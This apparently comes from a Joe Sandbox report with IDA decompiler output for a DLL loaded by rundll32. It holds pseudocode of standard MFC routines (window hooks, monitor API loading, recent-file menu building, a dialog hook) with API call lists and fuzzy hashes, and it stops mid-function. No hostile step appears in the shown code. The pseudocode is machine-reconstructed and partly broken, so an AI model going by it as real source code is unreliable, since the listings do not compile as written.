                                                                                                            				void* _t90;
                                                                                                            				void* _t99;
                                                                                                            				long* _t102;
                                                                                                            				signed int _t104;
                                                                                                            				long _t105;
                                                                                                            				CHAR* _t107;
                                                                                                            				int _t108;
                                                                                                            
                                                                                                            				_t52 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_push(0x100347fd);
                                                                                                            				_v8 = _t52;
                                                                                                            				_t90 = E10037855(0x1004efe8);
                                                                                                            				if(_a4 == 3) {
                                                                                                            					_t104 =  *(_t90 + 0x14);
                                                                                                            					_push(__edi);
                                                                                                            					_t99 =  *_a12;
                                                                                                            					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
                                                                                                            					_a4 = _t56;
                                                                                                            					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
                                                                                                            						if( *0x1004f354 == 0) {
                                                                                                            							L10:
                                                                                                            							if(_t104 == 0) {
                                                                                                            								if( *0x1004ef68 != 0) {
                                                                                                            									L16:
                                                                                                            									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
                                                                                                            										L20:
                                                                                                            										_t58 = GetWindowLongA(_a8, 0xfffffffc);
                                                                                                            										_v16 = _t58;
                                                                                                            										if(_t58 != 0) {
                                                                                                            											_t107 = "AfxOldWndProc423";
                                                                                                            											if(GetPropA(_a8, _t107) == 0) {
                                                                                                            												SetPropA(_a8, _t107, _v16);
                                                                                                            												if(GetPropA(_a8, _t107) == _v16) {
                                                                                                            													GlobalAddAtomA(_t107);
                                                                                                            													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            										goto L24;
                                                                                                            									}
                                                                                                            									goto L24;
                                                                                                            								}
                                                                                                            								_t108 = 0x30;
                                                                                                            								E10011C50( &_v320, 0, _t108);
                                                                                                            								_v320.cbSize = _t108;
                                                                                                            								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
                                                                                                            								 *0x1004ef68 = _t71;
                                                                                                            								if(_t71 == 0) {
                                                                                                            									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									_v17 = 0;
                                                                                                            									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
                                                                                                            										goto L24;
                                                                                                            									}
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							E1002212F(_t104, _a8);
                                                                                                            							 *((intOrPtr*)( *_t104 + 0x50))();
                                                                                                            							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
                                                                                                            							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
                                                                                                            							if(_t81 != E1002292C) {
                                                                                                            								 *_t102 = _t81;
                                                                                                            							}
                                                                                                            							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						_t83 =  *(_t99 + 0x28);
                                                                                                            						if(_t83 <= 0xffff) {
                                                                                                            							_v16 = 0;
                                                                                                            							GlobalGetAtomNameA(0,  &_v16, 5);
                                                                                                            							_t83 =  &_v16;
                                                                                                            						}
                                                                                                            						if(lstrcmpiA(_t83, "ime") == 0) {
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						L24:
                                                                                                            						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
                                                                                                            						if(_a4 != 0) {
                                                                                                            							UnhookWindowsHookEx( *(_t90 + 0x28));
                                                                                                            							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
                                                                                                            						}
                                                                                                            						_t60 = _t105;
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
                                                                                                            					L27:
                                                                                                            					return E100117AE(_t60, _v8);
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x100237e0
                                                                                                            0x100235f8
                                                                                                            0x10023604
                                                                                                            0x100237e1
                                                                                                            0x100237eb
                                                                                                            0x100237eb

                                                                                                            APIs
                                                                                                              • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                                                            • CallNextHookEx.USER32 ref: 10023604
                                                                                                            • GetClassLongA.USER32 ref: 10023649
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 10023675
                                                                                                            • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                                                            • SetWindowLongA.USER32 ref: 100236BE
                                                                                                            • CallNextHookEx.USER32 ref: 100237C2
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                            • API String ID: 3204395069-4034971020
                                                                                                            • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                                                            • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1000799F() {
                                                                                                            				void* __edi;
                                                                                                            				intOrPtr _t5;
                                                                                                            				_Unknown_base(*)()* _t6;
                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                            				_Unknown_base(*)()* _t8;
                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                            				_Unknown_base(*)()* _t10;
                                                                                                            				_Unknown_base(*)()* _t11;
                                                                                                            				_Unknown_base(*)()* _t12;
                                                                                                            				void* _t17;
                                                                                                            				struct HINSTANCE__* _t18;
                                                                                                            				intOrPtr _t23;
                                                                                                            				_Unknown_base(*)()* _t24;
                                                                                                            
                                                                                                            				_t23 =  *0x1004ee14; // 0x0
                                                                                                            				if(_t23 == 0) {
                                                                                                            					_push(_t17);
                                                                                                            					 *0x1004ee18 = E10007952(_t17);
                                                                                                            					_t18 = GetModuleHandleA("USER32");
                                                                                                            					if(_t18 == 0) {
                                                                                                            						L11:
                                                                                                            						 *0x1004edf8 = 0;
                                                                                                            						 *0x1004edfc = 0;
                                                                                                            						 *0x1004ee00 = 0;
                                                                                                            						 *0x1004ee04 = 0;
                                                                                                            						 *0x1004ee08 = 0;
                                                                                                            						 *0x1004ee0c = 0;
                                                                                                            						 *0x1004ee10 = 0;
                                                                                                            						 *0x1004ee14 = 1;
                                                                                                            						_t5 = 0;
                                                                                                            					} else {
                                                                                                            						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                            						 *0x1004edf8 = _t6;
                                                                                                            						if(_t6 == 0) {
                                                                                                            							goto L11;
                                                                                                            						} else {
                                                                                                            							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                            							 *0x1004edfc = _t7;
                                                                                                            							if(_t7 == 0) {
                                                                                                            								goto L11;
                                                                                                            							} else {
                                                                                                            								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                            								 *0x1004ee00 = _t8;
                                                                                                            								if(_t8 == 0) {
                                                                                                            									goto L11;
                                                                                                            								} else {
                                                                                                            									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                            									 *0x1004ee04 = _t9;
                                                                                                            									if(_t9 == 0) {
                                                                                                            										goto L11;
                                                                                                            									} else {
                                                                                                            										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                            										 *0x1004ee0c = _t10;
                                                                                                            										if(_t10 == 0) {
                                                                                                            											goto L11;
                                                                                                            										} else {
                                                                                                            											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                            											 *0x1004ee08 = _t11;
                                                                                                            											if(_t11 == 0) {
                                                                                                            												goto L11;
                                                                                                            											} else {
                                                                                                            												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                            												 *0x1004ee10 = _t12;
                                                                                                            												if(_t12 == 0) {
                                                                                                            													goto L11;
                                                                                                            												} else {
                                                                                                            													_t5 = 1;
                                                                                                            													 *0x1004ee14 = 1;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t5;
                                                                                                            				} else {
                                                                                                            					_t24 =  *0x1004ee08; // 0x0
                                                                                                            					return 0 | _t24 != 0x00000000;
                                                                                                            				}
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                            • API String ID: 667068680-68207542
                                                                                                            • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                                                            • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				char _v32;
                                                                                                            				char _v268;
                                                                                                            				char _v292;
                                                                                                            				char _v296;
                                                                                                            				signed int _v300;
                                                                                                            				CHAR* _v304;
                                                                                                            				intOrPtr _v308;
                                                                                                            				char _v312;
                                                                                                            				char _v316;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t102;
                                                                                                            				intOrPtr _t106;
                                                                                                            				signed int _t108;
                                                                                                            				signed int _t110;
                                                                                                            				int* _t118;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t128;
                                                                                                            				signed int _t132;
                                                                                                            				void* _t136;
                                                                                                            				intOrPtr* _t138;
                                                                                                            				void* _t170;
                                                                                                            				intOrPtr* _t171;
                                                                                                            				void* _t173;
                                                                                                            				int _t175;
                                                                                                            				intOrPtr _t176;
                                                                                                            				signed int _t177;
                                                                                                            				intOrPtr _t180;
                                                                                                            				intOrPtr* _t181;
                                                                                                            				signed int _t182;
                                                                                                            				intOrPtr _t183;
                                                                                                            				signed char _t196;
                                                                                                            				signed char _t197;
                                                                                                            				signed int _t217;
                                                                                                            				intOrPtr* _t219;
                                                                                                            				intOrPtr* _t220;
                                                                                                            				void* _t223;
                                                                                                            				intOrPtr* _t224;
                                                                                                            				signed int _t226;
                                                                                                            				void* _t228;
                                                                                                            				void* _t229;
                                                                                                            				void* _t230;
                                                                                                            
                                                                                                            				_t223 = __esi;
                                                                                                            				_t181 = __ecx;
                                                                                                            				_t170 = __ebx;
                                                                                                            				_t102 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_push(__esi);
                                                                                                            				_push(__edi);
                                                                                                            				_v8 = _t102;
                                                                                                            				_t219 = __ecx;
                                                                                                            				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
                                                                                                            					L10:
                                                                                                            					_push(0);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_push(3);
                                                                                                            					E10027180(_t181);
                                                                                                            					asm("int3");
                                                                                                            					E10011BF0(0x1003ab29, _t228);
                                                                                                            					_t230 = _t229 - 0x12c;
                                                                                                            					_t106 =  *0x1004c470; // 0x6edecb8c
                                                                                                            					_push(_t170);
                                                                                                            					_push(_t223);
                                                                                                            					_t224 = _a4;
                                                                                                            					_push(_t219);
                                                                                                            					_t220 = _t181;
                                                                                                            					_t182 =  *(_t224 + 0xc);
                                                                                                            					_v20 = _t106;
                                                                                                            					_t171 = _t220 + 0x1c;
                                                                                                            					_t108 =  *( *_t171 - 0xc);
                                                                                                            					__eflags = _t108;
                                                                                                            					if(_t108 == 0) {
                                                                                                            						__eflags = _t182;
                                                                                                            						if(_t182 != 0) {
                                                                                                            							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
                                                                                                            					_t110 = 0;
                                                                                                            					__eflags =  *(_t183 - 0xc);
                                                                                                            					if( *(_t183 - 0xc) != 0) {
                                                                                                            						__eflags =  *(_t224 + 0xc);
                                                                                                            						if( *(_t224 + 0xc) != 0) {
                                                                                                            							_t173 = 0;
                                                                                                            							__eflags =  *(_t220 + 4);
                                                                                                            							if( *(_t220 + 4) > 0) {
                                                                                                            								do {
                                                                                                            									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
                                                                                                            									_t173 = _t173 + 1;
                                                                                                            									__eflags = _t173 -  *(_t220 + 4);
                                                                                                            								} while (_t173 <  *(_t220 + 4));
                                                                                                            							}
                                                                                                            							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
                                                                                                            							__eflags = _t110;
                                                                                                            							if(_t110 != 0) {
                                                                                                            								__eflags = _t110 - 0x104;
                                                                                                            								if(_t110 < 0x104) {
                                                                                                            									_t175 = lstrlenA( &_v292);
                                                                                                            									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
                                                                                                            									_t176 = _t175 + 1;
                                                                                                            									_v308 = _t176;
                                                                                                            									 *((char*)(_t228 + _t176 - 0x120)) = 0;
                                                                                                            									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                                                            									_v8 = _v8 & 0x00000000;
                                                                                                            									_t118 = E100243B2();
                                                                                                            									_t216 =  *_t118;
                                                                                                            									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
                                                                                                            									_a4 = _a4 & 0x00000000;
                                                                                                            									__eflags =  *(_t220 + 4);
                                                                                                            									_v8 = 1;
                                                                                                            									if( *(_t220 + 4) > 0) {
                                                                                                            										while(1) {
                                                                                                            											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
                                                                                                            											__eflags = _t125;
                                                                                                            											if(_t125 == 0) {
                                                                                                            												goto L40;
                                                                                                            											}
                                                                                                            											_t177 = _v300;
                                                                                                            											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
                                                                                                            											while(1) {
                                                                                                            												_t196 =  *_t177;
                                                                                                            												__eflags = _t196;
                                                                                                            												if(_t196 == 0) {
                                                                                                            													break;
                                                                                                            												}
                                                                                                            												__eflags = _t196 - 0x26;
                                                                                                            												if(_t196 == 0x26) {
                                                                                                            													 *_t128 = _t196;
                                                                                                            													_t128 = _t128 + 1;
                                                                                                            													__eflags = _t128;
                                                                                                            												}
                                                                                                            												_t197 =  *_t177;
                                                                                                            												_t217 = _t197 & 0x000000ff;
                                                                                                            												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
                                                                                                            												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
                                                                                                            													 *_t128 = _t197;
                                                                                                            													_t128 = _t128 + 1;
                                                                                                            													_t177 = _t177 + 1;
                                                                                                            													__eflags = _t177;
                                                                                                            												}
                                                                                                            												 *_t128 =  *_t177;
                                                                                                            												_t128 = _t128 + 1;
                                                                                                            												_t177 = _t177 + 1;
                                                                                                            												__eflags = _t177;
                                                                                                            											}
                                                                                                            											 *_t128 = _t196;
                                                                                                            											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
                                                                                                            											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
                                                                                                            											__eflags = _t132 - 0xa;
                                                                                                            											if(__eflags <= 0) {
                                                                                                            												if(__eflags != 0) {
                                                                                                            													wsprintfA( &_v32, ??, "&%d ", _t132);
                                                                                                            													goto L38;
                                                                                                            												} else {
                                                                                                            													lstrcpyA( &_v32, "1&0 ");
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												wsprintfA( &_v32, ??, "%d ", _t132);
                                                                                                            												L38:
                                                                                                            												_t230 = _t230 + 0xc;
                                                                                                            											}
                                                                                                            											_push( &_v32);
                                                                                                            											_t136 = E10006B11( &_v312, __eflags);
                                                                                                            											_push( &_v296);
                                                                                                            											_push(_t136);
                                                                                                            											_push( &_v316);
                                                                                                            											_v8 = 2;
                                                                                                            											_t138 = E10024DC7( &_v296, __eflags);
                                                                                                            											_t216 =  *(_t224 + 8);
                                                                                                            											_t203 =  *(_t224 + 4);
                                                                                                            											_t77 = _t216 + 1; // 0x1
                                                                                                            											 *(_t224 + 8) = _t77;
                                                                                                            											_t79 = _t203 + 1; // 0x3
                                                                                                            											_t230 = _t230 + 0xc;
                                                                                                            											 *(_t224 + 4) = _t79;
                                                                                                            											_v304 =  *_t138;
                                                                                                            											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
                                                                                                            											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
                                                                                                            											_v8 = 1;
                                                                                                            											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
                                                                                                            											_a4 = _a4 + 1;
                                                                                                            											__eflags = _a4 -  *(_t220 + 4);
                                                                                                            											if(_a4 <  *(_t220 + 4)) {
                                                                                                            												_t176 = _v308;
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L40;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L40:
                                                                                                            									 *(_t224 + 8) =  *(_t224 + 8) - 1;
                                                                                                            									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
                                                                                                            									 *((intOrPtr*)(_t224 + 0x18)) = 1;
                                                                                                            									E100014B0(_v296 + 0xfffffff0, _t216);
                                                                                                            									__eflags = _v300 + 0xfffffff0;
                                                                                                            									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t180 =  *_t171;
                                                                                                            						__eflags =  *(_t180 - 0xc);
                                                                                                            						if( *(_t180 - 0xc) != 0) {
                                                                                                            							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
                                                                                                            						}
                                                                                                            						_t110 =  *((intOrPtr*)( *_t224))(0);
                                                                                                            					}
                                                                                                            					 *[fs:0x0] = _v16;
                                                                                                            					return E100117AE(_t110, _v20);
                                                                                                            				} else {
                                                                                                            					_push(_a4);
                                                                                                            					_push( &_v268);
                                                                                                            					if(E1002592C(__ebx, _t219, __esi) == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						_t226 = 0;
                                                                                                            						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
                                                                                                            							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
                                                                                                            								_t226 = _t226 + 1;
                                                                                                            								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
                                                                                                            									continue;
                                                                                                            								} else {
                                                                                                            								}
                                                                                                            								L8:
                                                                                                            								while(_t226 > 0) {
                                                                                                            									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
                                                                                                            									_t226 = _t226 - 1;
                                                                                                            									__eflags = _t226;
                                                                                                            								}
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						L9:
                                                                                                            						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                                                            • __EH_prolog.LIBCMT ref: 1002506B
                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                                                            • wsprintfA.USER32 ref: 1002522E
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                                                            • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                                                            • GetMenuItemCount.USER32 ref: 100252CC
                                                                                                              • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                                                            • String ID: %d $&%d $1&0 $\
                                                                                                            • API String ID: 342826643-2399880791
                                                                                                            • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                                                            • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t31;
                                                                                                            				signed int _t33;
                                                                                                            				void* _t40;
                                                                                                            				int _t46;
                                                                                                            				intOrPtr _t64;
                                                                                                            				signed int* _t65;
                                                                                                            				void* _t67;
                                                                                                            				intOrPtr* _t69;
                                                                                                            
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_push(0x100347fd);
                                                                                                            					_t53 = 0x1004efe8;
                                                                                                            					_t67 = E10037855(0x1004efe8);
                                                                                                            					__eflags =  *(_t67 + 0x18);
                                                                                                            					if( *(_t67 + 0x18) != 0) {
                                                                                                            						_push(_a4);
                                                                                                            						__eflags = E10022115();
                                                                                                            						if(__eflags == 0) {
                                                                                                            							_t53 =  *(_t67 + 0x18);
                                                                                                            							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
                                                                                                            							 *(_t67 + 0x18) = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t64 = _a8;
                                                                                                            					__eflags = _t64 - 0x110;
                                                                                                            					if(_t64 != 0x110) {
                                                                                                            						__eflags = _t64 -  *0x1004f3b8; // 0x0
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L22:
                                                                                                            							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                                                            							_t31 = 1;
                                                                                                            							__eflags = 1;
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            						__eflags = _t64 - 0x111;
                                                                                                            						if(_t64 != 0x111) {
                                                                                                            							L10:
                                                                                                            							__eflags = _t64 - 0xc000;
                                                                                                            							if(_t64 >= 0xc000) {
                                                                                                            								_push(_a4);
                                                                                                            								_t69 = E10022115();
                                                                                                            								_t33 = E100244DE(_t69, 0x10040f58);
                                                                                                            								__eflags = _t33;
                                                                                                            								if(_t33 == 0) {
                                                                                                            									L14:
                                                                                                            									__eflags = _t64 -  *0x1004f3ac; // 0x0
                                                                                                            									if(__eflags != 0) {
                                                                                                            										__eflags = _t64 -  *0x1004f3b0; // 0x0
                                                                                                            										if(__eflags != 0) {
                                                                                                            											__eflags = _t64 -  *0x1004f3a8; // 0x0
                                                                                                            											if(__eflags != 0) {
                                                                                                            												__eflags = _t64 -  *0x1004f3b4; // 0x0
                                                                                                            												if(__eflags != 0) {
                                                                                                            													goto L11;
                                                                                                            												}
                                                                                                            												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
                                                                                                            												goto L23;
                                                                                                            											}
                                                                                                            											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            										_t19 = _t69 + 0x1c0; // 0x1c0
                                                                                                            										_t65 = _t19;
                                                                                                            										 *_t65 = _a16;
                                                                                                            										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
                                                                                                            										 *_t65 =  *_t65 & 0x00000000;
                                                                                                            										goto L23;
                                                                                                            									}
                                                                                                            									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
                                                                                                            									goto L23;
                                                                                                            								}
                                                                                                            								_t40 = E1001CE89(_t69);
                                                                                                            								__eflags =  *(_t40 + 0x36) & 0x00000008;
                                                                                                            								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
                                                                                                            									goto L11;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							L11:
                                                                                                            							_t31 = 0;
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            						__eflags = _a12 - 0x40e;
                                                                                                            						if(_a12 == 0x40e) {
                                                                                                            							goto L22;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                                                                                                            						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
